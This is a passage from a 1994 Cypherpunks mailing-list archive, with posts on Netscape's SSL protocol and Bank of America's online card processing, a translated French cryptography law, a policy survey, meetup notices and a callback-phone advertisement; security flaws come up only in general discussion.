current consumption chip] I fail to see how this would increase cryptographic potential. However, it would seem to mask the device's EMR. One of the largest sources of radiated signal goes out the power supply. Some of the really high security chips, evidently, double every gate for constant current draw. Eric From joshua at dee.retix.com Fri Dec 9 07:24:35 1994 From: joshua at dee.retix.com (joshua geller) Date: Fri, 9 Dec 94 07:24:35 PST Subject: L.A. area meeting In-Reply-To: <941209084822_1476905@aol.com> Message-ID: <199412091525.HAA06316@sleepy.retix.com> > There will be a meeting under the announced name "L.A. Cypherpunks" > at the California Coffee House, 4455 Overland Avenue, Culver City, > CA 90230 (310) 559-8868 to discuss privacy issues and tactics. > If any of y'all want to show up and flame on about your pet projects > and sell stuff, it is a free, informal gathering -- show up any time > between noon and 5 P.M. what day? josh From crypto at nas.edu Fri Dec 9 07:46:37 1994 From: crypto at nas.edu (CRYPTO) Date: Fri, 9 Dec 94 07:46:37 PST Subject: Question #1 to the community regarding National... Message-ID: <9411097869.AA786998597@nas.edu> Subject: Question #1 to the community regarding National Cryptography Policy As many of you know, the National Research Council is undertaking a study of national cryptography policy (description available on request to CRYPTO at NAS.EDU). This note is the first of a number of questions that will be posted to the Internet community in our attempt to solicit input on a broad scale. Please circulate this request to anyone that you think might be able to contribute. The question of this posting is the following: How, if at all, do capabilities enabled by new and emerging technology in telecommunications (e.g., key-escrow encryption technologies, digital telephony) and electronic networking make it _easier_ for those who control that technology to compromise and/or protect the interests of individual end users? Please use as the standard of comparison the ease _today_ of compromising or protecting these interests. We are interested in scenarios in which these interests might be compromised or protected both individually and on a large scale. Please be sure to tell us the interests you believe are at stake. Please send your comments on this question to CRYPTO at NAS.EDU. From ddt at lsd.com Fri Dec 9 08:56:24 1994 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 9 Dec 94 08:56:24 PST Subject: BofA+Netscape Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Lads, I thought many of you would be interested in the text of this story. I'm wondering if anyone has any comments on the excryption mechanism (i.e. "eavesdropping" protection) being used. I believe, from my visits to the Netscape (formerly Mosaic) Communications Inc. offices that they are using RSA, but I'm not sure how *secure* their implementation is (eg. key size, etc.). I'll be contacting my local branch to inquire as to how soon I'll be able to use the service and will post my experiences with it as soon as possible. This development certainly signals a major breakthrough in E$ technology. dave ____________________________________________________________ "Money is the root of all Evil. Send $9.95 for more info." =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bank of America Goes Online With Credit Card Service By David Einstein, Chronicle Staff Writer In a major step toward electronic commerce, Bank of America announced yesterday it will launch a system next month for processing credit card transactions on the Internet. The bank, second largest in the United States after Citicorp, will use software from Netscape Communications to make it safe for merchants and consumers to do business online. Lack of a secure way to transmit credit card information has been the biggest obstacle to conducting business on the Internet, a global computer network reaching some 30 million people. "Secure payment processing is a critical element to making elec tronic commerce happen," said Netscape spokeswoman Rosanne Siino. She called the BofA announcement "a pretty big deal for us." Netscape's software incorporates data encryption that protects online communications from eavesdroppers. It also gives both parties in a transaction the ability to verify each other's identity. BofA intends to market its new service to merchants for whom it currently processes ordinary credit card transactions. The service will be free to consumers, who will be able to make purchases with almost any major credit card. Officials of the San Francisco based bank said they do not expect online processing to generate a flood of business immediately. "We anticipate that the maturity of this product is going to take a year if not years to develop," said Jim Aviles, vice president of marketing for BofA Merchant Services. Electronic shopping is not expected to catch on until the public gains widespread, low-cost access to the Internet. Full access is still expensive and not available everywhere. Netscape, an 8-month-old company based in Mountain View, is one of the leading makers of software used to navigate the Internet via a Windowslike interface. One of the company's founders is Marc Andreessen, the 23-year-old whiz kid who developed Mosaic, the navigation program that ignited interest in the Internet last year. Yesterday's announcement was the latest in a series of deals involving Netscape. Late last month, MCI said it would use the company's technology as the core of its planned internetMCI electronic shopping service. San Francisco Chronicle 6 December 94 (Business) Section D, Pg 1 ("D1") - -30- -----BEGIN PGP SIGNATURE----- Version: 2.6somethingorother iQCVAgUBLugg0KHBOF9KrwDlAQFxNQP+NZCPCkuIoWfp4PJszoYDlY2UmkBPcLfa VyfuU0yMimJa1MW3Oolf5PyNpK2M7+yastFIRL1MmjxUi8FOZ6qQjIIsMe8ahuJV YVwCf9+v2Ll8XaDywG9+zvhQI4WoTBCL0aoCbKZkhm56IKj00aXMDP+zXYpx/SZM Z6bp0YNKk/Y= =UTZA -----END PGP SIGNATURE----- From hfinney at shell.portal.com Fri Dec 9 09:01:02 1994 From: hfinney at shell.portal.com (Hal) Date: Fri, 9 Dec 94 09:01:02 PST Subject: cut & choose In-Reply-To: <199412082010.OAA00148@omaha.omaha.com> Message-ID: <199412091700.JAA03881@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Alex Strasheim writes: >I don't understand why anyone would use the cut and choose protocol over >denominated keys. Chaum's method seems a lot cleaner to me and more >secure. It obviously uses less bandwidth. What am I missing here? Schneier's examples are meant to be instructional in nature rather than practical, showing how it would be done with paper envelopes and such. The only example he has which is cryptographic is the "off-line" version where Alice's identity is encoded in the cash in such a way that it is revealed if she double-spends. Chaum's off-line protocol also relies on cut and choose for this (Chaum, Fiat, Naor, Crypto 88). That is the major improvement in Brands' scheme, that you don't have to use cut and choose for his off-line cash system. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLuiNKxnMLJtOy9MBAQH1HgH/SycFuvD/vud4ZHUU8b8WDV+KgsfoyxbT 4Immhq478EcLhbLPrjriinyue17lc4fChQDPhm7Wg/i3w9rkaQQwGg== =hyg3 -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Fri Dec 9 10:12:55 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 9 Dec 94 10:12:55 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <199412091814.NAA07757@hermes.bwh.harvard.edu> | Lads, | | I thought many of you would be interested in the text of this story. I'm | wondering if anyone has any comments on the excryption mechanism (i.e. | "eavesdropping" protection) being used. It my personal feeling that Netscape doesn't have the right talent mix to develop secure software. For example, they may well get the RSA parts right, and then store the passphrase in a text file, 'for ease of use.' The RSA is secure, but the system is not secure if usnauthorized people using your machine is a possibility. Writing secure software is a difficult and tricky buisness that requires a lot of effort; early versions of Mosaic had problems. Netscape really needs to develop a threat model that allows them to assess the severity of potential problems. It is my guess that they have not done so, although, I'd be pleased to hear I'm wrong. Everyone's favorite company, First Virtual, seems to have developed a threat model that allows them to offload allmost all risk and security problems to their customers. It may not be a good solution, but at least they have considered how the security of their system intersects the real world. Just integrating RSA does not do that. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From pierre at shell.portal.com Fri Dec 9 10:49:25 1994 From: pierre at shell.portal.com (Pierre Uszynski) Date: Fri, 9 Dec 94 10:49:25 PST Subject: crypto email to France In-Reply-To: <9412072357.AA00829@chuckwala> Message-ID: <199412091848.KAA20985@jobe.shell.portal.com> Rebecca Farr said: > My company would like to be able to send encrypted mail to our office > in Paris.[...] > I've been told by someone > here in the US that France wants control of any use of encryption software > including sending email. I don't recommend relying on info found on the net without tracking it back to its sources. In this case, the official publication of the French laws, fairly accessible anyway (in France :-) In any case, you could take a look at: http://www.ens.fr/equipes_dmi/grecc/loi.html where is stored what is claimed to be a transcript of the relevant French law (missing is the regulatory procedure which is as important to you). At least missing last time I looked. You can also look around at that group's home page: http://snekkar.ens.fr:80/equipes_dmi/grecc/ I posted to this group a tentative translation in September, here it is again: As to the quality of the translation: I'm not an american lawyer, nor a french lawyer, and any given legal paragraph can usually be interpreted either way. This may not even be my reading tomorrow... To avoid confusing things even further, I'll limit my comments to remarks concerning the translation, in square brackets []. And don't blame me for the quality of the English, the French itself is laughable. Have fun, Pierre. pierre at shell.portal.com ++++++ translation of the ENS post, as of Sept 23, 1994 ++++++++ Law number 90-1170, published in the "Journal Officiel" of December 30, 1990. (The first 27 articles concern the encryption of information transmitted via radio or mail.) Article 28. - By cryptologic services, one means all services aimed at transforming through secret conventions information or clear signals into information or signals unintelligible by third parties, or at achieving the reverse operation, via means, hardware or software, designed to that end. To preserve the interests of defense and internal or external national security, the supply, export, or use of cryptologic means or services are subject: a) to prior declaration when this means or service can have no other use than authenticating a communication or than ensuring the integrity of the transmitted message. b) to prior authorization by the Prime Minister in all other cases. A decree of the "Conseil d'Etat" [President and some ministers, if I recall] determines the circumstances in which the declaration is filed, or the authorization granted, as per the previous paragraph. This decree can make provisions for a simplified system of declaration or authorization for certain types of equipment or services, or for certain categories of users. II. - In addition to the provisions of the customs code, anyone having exported a cryptologic means, or having provided or made to be provided a cryptologic service without the authorization mentioned in paragraph I of the present article, will be punished by a fine of 6000 F [US$1,200] to 500 000 F [US$100,000] and by imprisonment of one to three months or by one of these two sentences only. The court can, in addition, forbid the person from requesting this authorization for a period of at most two years, or five years for subsequent offenses. In case of conviction, the court can, in addition, pronounce the forfeiture of the cryptologic equipment. III. - In addition to police officers and customs officers in their jurisdiction, agents authorized for this purpose by the Prime Minister and sworn in the conditions specified by the "Conseil d'Etat", can investigate and report by a [sworn, whatever] statement any violations of the present article and of the corresponding regulations. Their statements are forwarded within five days to the "Procureur de la Republique" [district attorney ?]. They can enter business locations and transportation means, request the disclosure of any business documents and take copies of them. They can, on location or by convocation, collect information and justifications. ===================================== Decree Number 92-1358 of December 28, 1992, published in the "Journal Officiel" of December 30, 1992. Decision of December 28, 1992 about declarations and requests for authorization relative to cryptologic equipment and services. ... Art. 4 - Require prior declaration, the provision, export, and use of any cryptologic equipment and services ... in particular : - The equipment, hardware or software, susceptible to ensure the confidentiality of communications of any nature, or the confidentiality of data stored in memory; - Cryptologic services that ensure the confidentiality of all or part of a communication, or of data stored in memory; - Cryptoanalytic equipment and services. [This "declaration" article may in fact be an "authorization" article. That would be a pretty major mistake of the previous transcriber.] Art. 6 - Smart cards that do not allow, in and of themselves, that is without the need for external cryptologic devices, to ensure the confidentiality of communications, benefit of the same declarations filed and authorizations obtained for the equipment and services with which they are used. Art. 7 - Are not considered cryptologic equipment, the means, hardware or software, specifically designed for the protection of software against illegal copying or use, even if they use methods or devices kept secret, on the condition that they do not allow the encryption, either directly or indirectly of that software package. ... Art. 9 - In case of uncertainty of the requestor, as to whether some equipment or service belongs to the category of cryptologic equipment and services, the central service for the security of information systems is consulted. Paris, Decmber 28, 1992. French version according to Jerome RABENOU Student at the Villetaneuse Law School. Paris - France. From tcmay at netcom.com Fri Dec 9 10:49:48 1994 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 9 Dec 94 10:49:48 PST Subject: BofA+Netscape In-Reply-To: <199412091814.NAA07757@hermes.bwh.harvard.edu> Message-ID: <199412091849.KAA01760@netcom15.netcom.com> Adam Shostack wrote: > It my personal feeling that Netscape doesn't have the right > talent mix to develop secure software. For example, they may well get > the RSA parts right, and then store the passphrase in a text file, > 'for ease of use.' The RSA is secure, but the system is not secure if > usnauthorized people using your machine is a possibility. > > Writing secure software is a difficult and tricky buisness > that requires a lot of effort; early versions of Mosaic had problems. Netscape is seeking people to write this stuff, as we heard at the last Cypherpunks meeting. So, this is the chance for Cyppherpunks to see it done right. I will speculate that Netscape, being a _very_ high-visibility company, is in contact with the folks at RSA Data Security about this, perhaps even using them to do the integration. (Recall that Bidzos is involved in a couple of efforts along these lines.) This doesn't mean they'll do it right, natch, but it gives us hope that the crypto protocols will at least be well-handled. (Ultra-speculative scenario: If I were the NSA/FBI/COMINT establishment, anxious to ensure "escrowed access," Netscape is something I'd be looking at. Ultra-speculatively, we should be on the lookout for any evidence that Netscape will be deploying any kind of "software key escrow" scheme, e.g., any links to the TIS proposals, to Denning, etc. "GAKscape"?) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From pierre at shell.portal.com Fri Dec 9 11:11:39 1994 From: pierre at shell.portal.com (Pierre Uszynski) Date: Fri, 9 Dec 94 11:11:39 PST Subject: crypto email to France In-Reply-To: <9412072357.AA00829@chuckwala> Message-ID: <199412091911.LAA25108@jobe.shell.portal.com> Rebecca Farr said: > Does anyone here know any details or where I might find out more about > what, if anything, needs to be done to legally exchange encrypted email > with our office in Paris? It would be great if you could post a summary of the practical procedure, once you find out. It's nice to have (an approximation of) the legal text, but that's usually quite removed from the actual paperwork. Thanks, Pierre. pierre at shell.portal.com From JLICQUIA at mhc.uiuc.edu Fri Dec 9 11:34:17 1994 From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI)) Date: Fri, 9 Dec 94 11:34:17 PST Subject: BofA+Netscape Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > It my personal feeling that Netscape doesn't have the right >talent mix to develop secure software. For example, they may well get >the RSA parts right, and then store the passphrase in a text file, >'for ease of use.' The RSA is secure, but the system is not secure if >usnauthorized people using your machine is a possibility. > > Writing secure software is a difficult and tricky buisness >that requires a lot of effort; early versions of Mosaic had problems. > > Netscape really needs to develop a threat model that allows >them to assess the severity of potential problems. It is my guess >that they have not done so, although, I'd be pleased to hear I'm >wrong. > > Everyone's favorite company, First Virtual, seems to have >developed a threat model that allows them to offload allmost all risk >and security problems to their customers. It may not be a good >solution, but at least they have considered how the security of their >system intersects the real world. Just integrating RSA does not do >that. This intrigued me, so I checked it out. I didn't see anything about a threat model, but they did have some extensive discussion about their security, including things I found interesting... They call their system "Secure Sockets Layer" (SSL), which appears to be a kind of link-level encryption which they layer below HTTP. This is opposed to SHTTP, which is more MIME-like. They don't seem to think much of SHTTP; their FAQ answers the question "Are there other secure browsers available?" with "Nope; no one else uses SSL at this time." (paraphrased) What's interesting is that they're planning to put NNTP, FTP, etc. on top of SSL as well, allowing for "secure FTP" and "secure news", etc. SSL is supposedly an open standard, and Netscape is pressing for it to become a true standard. Apparently, they've even issued an RFC for it. The full text of the SSL protocol is on their Web site. As for technical issues, they aren't very satisfactory concerning the kind of questions Adam raised; it's mostly about RC4 layered on top of RSA and MD5 hashes sent at this time, etc... The SSL spec contains a section on attacks which seems elementary even to my novice mind. Is there interest in posting the spec? It's in RFC format, but hasn't even been assigned a number yet, so it doesn't appear to be uncopyable, as it were. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuiwnjER5KvPRd0NAQGBNAP+PpTRHhzVq+ogPkCUP4vBSYG9ooOnSVOi tOaG+4zQYJa7iPBP11/aODYM9JjlNr8zGBDfKr1SzOI7ntg59C8/aGscc5XvJh5I wE2TxHOqA+OE+AtSy4jDE09yVG/TUZuO69Ig5+v/xJy+XU1nspUoJ02mi5EQo/59 Qq1nDoeKpoE= =vBg6 -----END PGP SIGNATURE----- From rsalz at osf.org Fri Dec 9 12:04:24 1994 From: rsalz at osf.org (Rich Salz) Date: Fri, 9 Dec 94 12:04:24 PST Subject: How to Destroy the Internet (was Info about Linux) Message-ID: <9412092000.AA08347@sulphur.osf.org> Is /etc/utmp still world-writeable on most machines these days? Hell, even CERT put out an advisory about this years ago. From farr at evtech.com Fri Dec 9 12:22:37 1994 From: farr at evtech.com (Rebecca Farr x260) Date: Fri, 9 Dec 94 12:22:37 PST Subject: crypto email to France Message-ID: <9412092024.AA01150@chuckwala> > > Rebecca Farr said: > > Does anyone here know any details or where I might find out more about > > what, if anything, needs to be done to legally exchange encrypted email > > with our office in Paris? > > It would be great if you could post a summary of the practical > procedure, once you find out. It's nice to have (an approximation of) > the legal text, but that's usually quite removed from the actual > paperwork. > > Thanks, > Pierre. > pierre at shell.portal.com > Thank you, Pierre, and everyone else who has responded both privately and through the cypherpunks mailing list. I will post a summary of the procedure and any other relevant information when I (finally!) find out what that is. Thanks also for the translation of the french law you posted. Someone from France had sent me the original, and while I can read it, this will save me some work writing up a translation for our lawyer. Best wishes to all, Rebecca Farr farr at evtech.com From samman at CS.YALE.EDU Fri Dec 9 13:02:07 1994 From: samman at CS.YALE.EDU (Ben) Date: Fri, 9 Dec 94 13:02:07 PST Subject: Secure DAC? In-Reply-To: <94Dec9.095259edt.3818@cannon.ecf.toronto.edu> Message-ID: > I fail to see how this would increase cryptographic potential. However, > it would seem to mask the device's EMR. The application notes state that > it is useful in CRT display drivers, audio encoders, &c. These are all > devices that are succeptable to TEMPEST monitoring (or whatever the > correct name is). If one output goes to the desired next stage (the The spooky term for it is MASINT-Measurement and Signals INT. Ben. From ddt at lsd.com Fri Dec 9 13:34:08 1994 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 9 Dec 94 13:34:08 PST Subject: Netscape SSL protocol URL Message-ID: Check out: http://home.mcom.com/info/SSL.html First few lines reproduced below. Sorry no sign on this one, must jet now! dave =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The SSL Protocol The SSL protocol has been submitted to the W3O working group on security for consideration as part of a general security approach for the Web, and we are actively working within the W3O and with many of its member entities on establishing open security standards for the net. This protocol specification was last revised on November 29th, 1994. Recent changes include: a fundamental correction to the client-certificate authentication protocol, the removal of the username/password messages, corrections in some of the cryptographic terminology, the addition of a MAC to the messages [see section 1.2], the allowance for different kinds of message digest algorithms. Internet Data Security Document Experimental Kipp E.B. Hickman Request For Comments: XXXX Netscape Communications Corp. Last Update: Nov. 29th, 1994 ______________________________________________________________________________ The SSL Protocol Status of this Memo This RFC specifies a security protocol for the Internet community, and requests discussion and suggestions for improvements. Distribution of this memo is unlimited. Abstract This document specifies the Secure Sockets Layer (SSL) protocol, a security protocol that provides privacy over the Internet. The protocol allows client/server applications to communicate in a way that cannot be eavesdropped. Server's are always authenticated and clients are optionally authenticated. [elided] From rarachel at prism.poly.edu Fri Dec 9 13:49:28 1994 From: rarachel at prism.poly.edu (Arsen Ray Arachelian) Date: Fri, 9 Dec 94 13:49:28 PST Subject: "Virus Alert" chain letter In-Reply-To: <199412070700.CAA10366@ducie.cs.umass.edu> Message-ID: <9412092134.AA23663@prism.poly.edu> I was just on AOL a few days ago. Steve Case, CEO of AOL stated that this was indeed just a rumor, and a cheap assed one at that, so we can dump this discussion. :-) There ain't no such good times virus. From pstemari at fsp.fsp.com Fri Dec 9 14:47:34 1994 From: pstemari at fsp.fsp.com (Paul Ste. Marie) Date: Fri, 9 Dec 94 14:47:34 PST Subject: (Fwd) Read this, Virus info!! In-Reply-To: <9412071644.AA00278@ch1d157nwk> Message-ID: <9412092247.AA00025@fsp.fsp.com> As OLE becomes more popular, this will be a bigger problem. It's quite possible to stick a nasty macro in an MS Word document that will get executed when the Word document is opened for viewed. Paul From turner at telecheck.com Fri Dec 9 15:07:54 1994 From: turner at telecheck.com (Joe Turner) Date: Fri, 9 Dec 94 15:07:54 PST Subject: Breaking the NSA In-Reply-To: Message-ID: <9412090637.AA07681@TeleCheck.com> > > On Thu, 8 Dec 1994, Ian Farquhar wrote: > > > I am told that a similar trick was tried by some people back in the > > early 1980's, when they were trying to figure out if the NSA could > > indeed break DES. There was no official response to these attempts. > > Or then again, maybe the people involved suddenly had the last 10 years > or so of their tax returns scrutinised; maybe they were denied social > benefits; etc. > Or then again maybe they were chopped up in little pieces and are buried in a hefty-sinch sack somewhere in the Nevada desert. Or maybe they were forced to watch an endless stream of bad T.V. sitcoms like T.J. Hooker until thier brains melted and ran down the sides of thier faces. Or maybe they just commited suicide becuase they just couldn't deal with all of the guilt... <> -- Joe N. Turner Telecheck International turner at telecheck.com 5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659 compu$erv: 73301,1654 (800) 888-4922 * (713) 439-6597 From hfinney at shell.portal.com Fri Dec 9 15:43:52 1994 From: hfinney at shell.portal.com (Hal) Date: Fri, 9 Dec 94 15:43:52 PST Subject: BofA+Netscape In-Reply-To: <199412091814.NAA07757@hermes.bwh.harvard.edu> Message-ID: <199412092343.PAA10962@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Here is a posting I made to www-security a few days ago when Netscape announced SSL. It did not get any response. I see though that they at least fixed their spelling... Date: Sun, 27 Nov 1994 12:12:47 -0800 From: Hal X-To: www-security at ns1.rutgers.edu Subject: Re: info on proposed SSL protocol and Netscape implementation Sender: owner-www-security at ns1.Rutgers.EDU I have a few comments on the proposed SSL and Netscape's HTTP-SSL that uses it. First, CHALLENGE is consistently mis-spelled CHALLANGE throughout the SSL document. Second, 3 cyphers are specified in this version of the document: RC4, RC2, and DES. I would like to see 3DES and/or IDEA. RC4 and RC2 have not to my knowledge received much public scrutiny, and the 56 bit key size of DES is of questionable security today. Of course these would be for the non-export versions. Third, it is not clear how practical the use of X.509 certificates will be. For example, the "name" field in the certificate must somehow be checked against the information which the client has about the server. Typically this will just be a machine address like home.mcom.com or something similar. Is X.509 a good fit for this purpose? I am not too familiar with X.509 but generally the names that I have seen are not in this form. Fourth, it would be nice if there were some support for non-certificate authentication of the server's public key. For example, the client may have obtained that key previously. I believe SHTTP is more flexible in this area. Fifth, I don't really like the idea that the Netscape client embeds "approved" certificate authority keys. I suspect that the CA situation is going to be in flux for quite a long time and one's client could easily get out of date. Note that the reliance on CA's seems to have slowed the acceptance of PEM as a widely used standard. PGP's anarchic "web of trust" has perhaps been a better fit to net culture. Sixth, the use of "https:" as a URL type for secure links provides for a very strict separation of secure and non-secure connections. Furthermore, this separation is chosen by the server operator. I would like to see a more flexible system, one where the client has more control over what information is transferred securely. The server may want to set a minimum, and refuse to exchange certain information non-securely, but it should not IMO also set the maximum. Some clients may be more privacy conscious than others. Some may not want information about which URL's they use to be available to local snoopers. The Netscape approach seems to put too much control into the hands of the servers and not enough into the hands of the clients. SHTTP also uses a special URL, but it seemed to be more open to the possibility of a negotiation between client and server for secure connections even on "http:" URLs. This would be done by having backwards compatibility with HTTP in which a non-secure-aware client or server would ignore or reject the security enhancements. The transaction could then proceed in non-secure mode with appropriate information displays to the user. SSL does not appear to allow for this kind of compatibility. Despite the negative tone here I think that SSL is potentially a good step towards enhanced privacy on the net. I think though that eventually encryption will be used far more widely than Netscape seems to have in mind. The net is so insecure that I suspect people will want privacy for all but the most casual uses. Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLujrKhnMLJtOy9MBAQFYdwH/VAObt9l6IKb44Z9mbCiz6DiRPjjA/mQp ZZq0ns/6xKQZvw3L77mTRECRuU8Gf1j3jUXZnqPxo7t8v+IyUuplCQ== =Z+0f -----END PGP SIGNATURE----- From Agorist003 at aol.com Fri Dec 9 17:01:15 1994 From: Agorist003 at aol.com (Agorist003 at aol.com) Date: Fri, 9 Dec 94 17:01:15 PST Subject: Saturday weekly L.A. gatherings Message-ID: <941209200115_1981339@aol.com> TAKE 2!: It's always something. Saturday, December 10, 1994, and weekly henceforth (on a trial basis, excluding vacations and holidays unless someone else wants to host it): There will be a meeting under the announced name "L.A. Cypherpunks" at the California Coffee House, 4455 Overland Avenue, Culver City, CA 90230 (310) 559-8868 to discuss privacy issues and tactics. If any of y'all want to show up and flame on about your pet projects and sell stuff, it is a free, informal gathering -- show up any time between noon and 5 P.M. The first logical order of business after introductions, is "is this the time and the place?" The California Coffee House is close to my home, and it is a compromise between the extremes of a restaurant and a meeting hall without food. They serve sandwiches and coffee. They are open 9 a.m. - 5 p.m. on Saturday. The meeting will start if anyone shows up besides myself and continue until closing time. And you'll even get a little brochure! Gosh, golly, gee whiz!! BCNU! Kent - jkh at story.com (consarn it all, skippy) From sghahn at math1.kaist.ac.kr Fri Dec 9 20:30:20 1994 From: sghahn at math1.kaist.ac.kr (han@joe.math.uga.edu) Date: Fri, 9 Dec 94 20:30:20 PST Subject: Looking for Hackers' Story Message-ID: <9412100426.AA03427@math1.kaist.ac.kr> I am looking for the sources about the general aspects of the hackers. I am writing an article for a Korean journal . I am writing about the origins, the history, the developments, the new trends, and its impact on the industry, etc. Pla Please send me an e-mail if you know any good sources. Thanks in advance. From kallback at halcyon.halcyon.com Fri Dec 9 12:46:34 1994 From: kallback at halcyon.halcyon.com (Jack Starworth) Date: 9 Dec 1994 20:46:34 GMT Subject: SAVE 50-90% ON INT'L LONG DIST-EVEN ON THE ROAD Message-ID: <3cafna$ka6@news.halcyon.com> THE BEST WAY TO SAVE ON INTERNATIONAL LONG DISTANCE IS TO USE KALLBACK DIRECT KALLBACK is the original "call-back" service provider. Kallback was specifically designed to save international businesses and frequent travelers 40%-90% on their international long distance. How it works is very simple. When you subscribe to Kallback, you receive a personal "trigger number." When you want to make an international call, dial your trigger number and hang up after the first ring. The Kallback computer will then call you back with a US dial tone, so instead of paying the local telephone company's rates, you are billed at Kallback's, which are among THE LOWEST IN THE WORLD. Because no outgoing call is ever completed, our customers who call from hotels DON'T HAVE TO PAY HOTEL TELEPHONE SURCHARGES. It doesn't matter where you need to make a call from, because your location number can be changed at any time. You can have the Kallback computer ask for you by name, by room number or both. You can even program in touch tones, so Kallback will work with your automatic phone answering system. Kallback also supports modems and fax machines. To give an idea of the savings you will see with Kallback, compare the rates you are paying now to the following: TO THE UNITED STATES FROM(per min in $US): Australia $ .52 Canada .23 France .49 India 1.06 Japan .78 Philippines .99 UK .36 Please feel free to call our 24 Hour Customer Service Department for more information. We can mail via post, fax or email information. (Requests for information via fax usually have the quickest turnaround.) Please include in your information requests the countries you call from and to. 24 HOUR CUSTOMER SERVICE DEPARTMENT: 206 281 0410 FAX: 206 281 0411 EMAIL: kallback at halcyon.com Thank You, Jack Starworth, Jr. Network Marketing Director "I don't really feel a mystic urge to fail you." --Prof. Avi Segal From cactus at hks.net Sat Dec 10 02:48:16 1994 From: cactus at hks.net (L. Todd Masco) Date: Sat, 10 Dec 94 02:48:16 PST Subject: Argh, apologies Message-ID: <199412101053.FAA27099@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- My most sincere apologies: due to a Truly Heinous filesystem lossage mode, (thanks, DEC, for ultrix 4.2!) the sign/forward service cypherpunks at hks.net has been broken since late Wednesday and everything through it has been lost. I just got back from DC/MD/VA and corrected the problem. I've modified things so that this will not happen again (at worst, signing and forwarding will be delayed until the queue is manually run). Again, I very much apologize for this. - -- Todd Masco | It's sometimes difficult to be too loud about your cactus at hks.net | enumerated rights when you're busy exercising your cactus at bb.com | unenumerated rights. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLumIeyoZzwIn1bdtAQFU6AGAu3BVYAsmo+8+mVRRhm5i4rPijBDOjUC0 b00JXC27ejVCzr2ZGis1f1pbwH+/9bDJ =xfn3 -----END PGP SIGNATURE----- From alano at teleport.com Sat Dec 10 10:03:33 1994 From: alano at teleport.com (Alan Olsen) Date: Sat, 10 Dec 94 10:03:33 PST Subject: BofA+Netscape Message-ID: <199412101803.KAA06370@desiree.teleport.com> >Lads, > >I thought many of you would be interested in the text of this story. I'm >wondering if anyone has any comments on the excryption mechanism (i.e. >"eavesdropping" protection) being used. I believe, from my visits to the >Netscape (formerly Mosaic) Communications Inc. offices that they are using >RSA, but I'm not sure how *secure* their implementation is (eg. key size, >etc.). I'll be contacting my local branch to inquire as to how soon I'll be >able to use the service and will post my experiences with it as soon as >possible. If you check their WWW page, you will find information on the Secure Sockets Layer. It explains the algorythm used (RC4) and key size (40 bits). The specification is available from a web page off of their site. With the latest version of Netscape, you can enable a "secure" connection with their site. To do so use: https://home.mcom.com/ as the home page address. (You need at least .96 to do this.) I am not certain as to their key exchange protocol... | "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From kafka at desert.xs4all.nl Sat Dec 10 10:12:53 1994 From: kafka at desert.xs4all.nl (Patrick '3l33t' Oonk) Date: Sat, 10 Dec 94 10:12:53 PST Subject: My apologies to the list (Re: ANSI Bombs are still a threat?) In-Reply-To: Message-ID: <199412101814.AA28641@xs1.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- meconlen at IntNet.net (Michael Conlen) once said: ME> ME> ME> On Wed, 7 Dec 1994, Roy M. Silvernail wrote: ME> ME> > That person asks that I post instructions for recovering from so heinous ME> > an attack. All I can suggest is escaping to a shell and doing a 'clear' ME> > (or, under MS-DOS, 'cls'). ME> ME> I have found that some attacks that leave your screen doing strange ME> things can be recoverd from by ussing the talk command. This program, on ME> UNIX machines seems to reset alot of things that might have gone array ME> with your screen. 'stty sane' also helps !*(#%&@#!*&*&(!#!@# NO CARRIER _______________________________________________________________________________ kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkkno, SL-1200 Kafka's home page _______________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBUAwUBLuhVV5RymF15lPcFAQEsiAH49DtxHeWC2GRa8sKGusHH+qQ0y8GuJHyA IP5zK7Zbj5jwVEcom881CkQWWygTuJiPl3P7sNhyAcDXTQoBjpUH =hhF7 -----END PGP SIGNATURE----- From samman at CS.YALE.EDU Sat Dec 10 10:20:59 1994 From: samman at CS.YALE.EDU (Ben) Date: Sat, 10 Dec 94 10:20:59 PST Subject: Callback phones Message-ID: I picked this up on the alt.2600 newsgroup. Seems like it could be used for things like privacy enhancement if it was coupled with a credit card/cashier's check that wasn't in your name along with perhaps a call back loop. Ben. Begin Forwarded Article: __________ From bdolan at well.sf.ca.us Sat Dec 10 13:43:34 1994 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Sat, 10 Dec 94 13:43:34 PST Subject: Big Brother database Message-ID: <199412102143.NAA28205@well.sf.ca.us> -----BEGIN PGP SIGNED 